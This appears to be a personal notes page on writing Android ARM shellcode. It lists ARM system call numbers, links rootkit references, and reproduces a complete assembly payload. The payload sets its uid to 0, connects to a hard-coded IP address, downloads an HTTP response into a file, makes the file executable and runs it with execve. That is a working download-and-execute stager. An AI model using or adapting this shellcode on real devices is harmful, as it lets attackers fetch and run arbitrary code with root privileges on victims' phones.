Android shellcodez
Write some note here.
System call table:
1 exit
2 fork
3 read
4 write
5 open
6 close
9 link
10 unlink
11 execve
12 chdir
14 mknod
15 chmod
19 lseek
20 getpid
21 mount
26 ptrace
29 pause
33 access
36 sync
38 rename
39 mkdir
40 rmdir
41 dup
42 pipe
43 times
45 brk
51 acct
52 umount2
54 ioctl
55 fcntl
57 setpgid
60 umask
61 chroot
63 dup2
64 getppid
66 setsid
67 sigaction
72 sigsuspend
73 sigpending
75 setrlimit
77 getrusage
78 gettimeofday
79 settimeofday
83 symlink
85 readlink
88 reboot
91 munmap
92 truncate
93 ftruncate
94 fchmod
96 getpriority
97 setpriority
103 syslog
104 setitimer
105 getitimer
114 wait4
116 sysinfo
118 fsync
120 clone
122 uname
125 mprotect
126 sigprocmask
128 init_module
129 delete_module
132 getpgid
133 fchdir
140 _llseek
142 _newselect
143 flock
144 msync
145 readv
146 writev
148 fdatasync
150 mlock
151 munlock
154 sched_setparam
155 sched_getparam
156 sched_setscheduler
157 sched_getscheduler
158 sched_yield
159 sched_get_priority_max
160 sched_get_priority_min
161 sched_rr_get_interval
162 nanosleep
163 mremap
168 poll
172 prctl
174 rt_sigaction
175 rt_sigprocmask
177 rt_sigtimedwait
180 pread64
181 pwrite64
183 getcwd
184 capget
185 capset
186 sigaltstack
187 sendfile
190 vfork
191 ugetrlimit
192 mmap2
195 stat64
196 lstat64
197 fstat64
198 lchown32
199 getuid32
200 getgid32
201 geteuid32
202 getegid32
203 setreuid32
204 setregid32
205 getgroups32
206 setgroups32
207 fchown32
208 setresuid32
209 getresuid32
210 setresgid32
211 getresgid32
212 chown32
213 setuid32
214 setgid32
217 getdents64
219 mincore
220 madvise
221 fcntl64
224 gettid
240 futex
248 exit_group
250 epoll_create
251 epoll_ctl
252 epoll_wait
257 timer_create
258 timer_settime
259 timer_gettime
260 timer_getoverrun
261 timer_delete
262 clock_settime
263 clock_gettime
264 clock_getres
265 clock_nanosleep
266 statfs64
267 fstatfs64
269 utimes
280 waitid
281 socket
282 bind
283 connect
284 listen
285 accept
286 getsockname
287 getpeername
288 socketpair
290 sendto
292 recvfrom
293 shutdown
294 setsockopt
295 getsockopt
296 sendmsg
297 recvmsg
314 ioprio_set
315 ioprio_get
316 inotify_init
317 inotify_add_watch
318 inotify_rm_watch
322 openat
323 mkdirat
325 fchownat
327 fstatat64
328 unlinkat
329 renameat
333 fchmodat
356 eventfd2
359 pipe2
983042 ARM_cacheflush
983045 ARM_set_tls
the Linux system call table api reference:
http://syscalls.kernelgrok.com/
Write your shellcode on Android, ARM. Have a notice on howto pass the arguments, perform the call and get the result.
http://bbs.pediy.com/showthread.php?t=155774
An Example copy from their:
.globl _start
.align 2
_start:
.code 32
adr r0, thumb + 1
bx r0
thumb:
.code 16
mov r0, #0
mov r7, #213
swi #0 @setuid32(0)
@创建文件
mov r2, #0x1C
lsl r2, #4 @S_IRWXU
mov r1, #0x24
lsl r1, #4
add r1, r1, #1 @O_CREAT|O_WRONLY|O_TRUNC
adr r0, name
mov r7, #5
swi #0 @int fd = open(name, O_CREAT|O_WRONLY|O_TRUNC, S_IRWXU)
mov r4, r0
mov r2, #6 @IPPROTO_TCP
mov r1, #1 @SOCK_STREAM
mov r0, #2 @AF_INET
mov r7, #250
add r7, #31
@建立连接
swi #0 @int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
mov r5, r0
mov r2, #16
adr r1, addr
mov r7, #250
add r7, #33
swi #0 @connect(sock, addr, 16)
@计算http头长度
adr r2, head
mov r1, r2
b L1
L0:
add r2, r2, #1
L1:
ldrb r0, [r2]
cmp r0, #0
bne L0
sub r2, r2, r1
mov r0, r5
mov r7, #4
swi #0 @write(sock, head, strlen(head))
@跳过http头
mov r3, #0
adr r6, nrnr
ldr r6, [r6]
L2:
mov r2, #252
sub sp, sp, #252
mov r1, sp
mov r0, r5
mov r7, #3
push {r3}
swi #0 @int len = read(sock, buf, 252)
pop {r3}
cmp r0, #0
ble L7
mov r2, #0
L3:
lsl r3, r3, #8
mov r1, sp
add r1, r2
ldrb r1, [r1]
add r3, r3, r1
add r2, r2, #1
cmp r3, r6
beq L4
cmp r2, r0
bne L3
add sp, sp, #252
b L2
L4:
mov r1, sp
add r1, r2
sub r2, r0, r2
b L6
@写入文件
L5:
mov r2, #252
sub sp, sp, #252
mov r1, sp
mov r0, r5
mov r7, #3
swi #0 @int len = read(sock, buf, 252)
cmp r0, #0
ble L7
mov r2, r0
mov r1, sp
L6:
mov r0, r4
mov r7, #4
swi #0 @write(fd, buf, len)
add sp, sp, #252
b L5
L7:
add sp, sp, #252
mov r0, r5
mov r7, #6
swi #0 @close(sock)
mov r0, r4
swi #0 @close(fd)
@执行文件
mov r1, #0x1C
lsl r1, #4 @S_IRUSR|S_IWUSR|S_IXUSR
adr r0, name
mov r7, #15
swi #0 @chmod(name, S_IRUSR|S_IWUSR|S_IXUSR)
mov r2, #0
mov r1, #0
push {r1}
adr r0, name
push {r0} @argv[0]
mov r1, sp @argv
mov r7, #11
swi #0 @execve(name, argv, NULL)
mov r0, #0
mov r7, #1
swi #0 @exit(0)
addr:
.short 2 @AF_INET
.ascii "\x00\x50" @port
.byte 202, 120, 2, 102 @ip
.zero 8
head:
.ascii "GET /"
.ascii "" @file
.ascii " HTTP/1.1\r\n"
.ascii "HOST: "
.ascii "www.android.com" @host
.ascii "\r\n\r\n\x00"
.zero 2
name:
.asciz "xxx"
nrnr:
.ascii "\n\r\n\r"
Here for howto get system call table:
https://viaforensics.com/mobile-security/syscalltable-android-playing-rootkits.html
And a perfect android kernel rookit paper here:
http://www.phrack.org/issues/68/6.html
Code Ref
x86: https://android.googlesource.com/kernel/common.git/+/android-3.10/arch/x86/kernel/entry_32.S
x64: https://android.googlesource.com/kernel/common.git/+/android-3.10/arch/x86/kernel/entry_64.S
arm: https://android.googlesource.com/kernel/common.git/+/android-3.10/arch/arm/kernel/entry-common.S